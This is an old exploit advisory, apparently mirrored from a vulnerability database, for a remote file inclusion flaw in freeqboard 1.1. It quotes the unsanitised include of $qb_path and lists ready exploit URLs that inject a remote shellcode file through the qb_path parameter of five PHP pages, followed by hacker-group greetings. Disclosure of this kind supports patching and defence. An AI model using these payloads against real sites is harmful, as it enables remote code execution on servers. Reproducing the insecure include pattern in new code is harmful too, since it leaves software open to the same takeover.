Lucene search

K
securityvulnsSecurityvulnsSECURITYVULNS:DOC:15283
HistoryDec 02, 2006 - 12:00 a.m.

freeqboard <= 1.1 (qb_path) Remote File Include Vulnerability

2006-12-0200:00:00
vulners.com
94

##################################################

                             #

freeqboard <= 1.1 (qb_path) Remote File Include Vulnerability

   #

                             #

Author: Mr.3FReeT

                  #

                             #

Softname: freeqboard

                 #

                             #

##################################################

code in :

about.php , contact.php , delete.php , faq.php , index.php

include "config.php";

include $qb_path."incs/mysql.php";

##################################################

Exploit :

""""""""

www.site.com/[path]/index.php?qb_path=shellcode.txt?

www.site.com/[path]/faq.php?qb_path=shellcode.txt?

www.site.com/[path]/delete.php?qb_path=shellcode.txt?

www.site.com/[path]/contact.php?qb_path=shellcode.txt?

www.site.com/[path]/about.php?qb_path=shellcode.txt?

##################################################

GreeTz: [ Dr.2 ] , [ ToOoFa ] , [ General C ] , [ asbmay ] , [ q8i^rock ]

, [ SHiKaA ] & KuW SeC TeaM

##################################################


Express yourself instantly with MSN Messenger! Download today it's FREE!
http://messenger.msn.click-url.com/go/onm00200471ave/direct/01/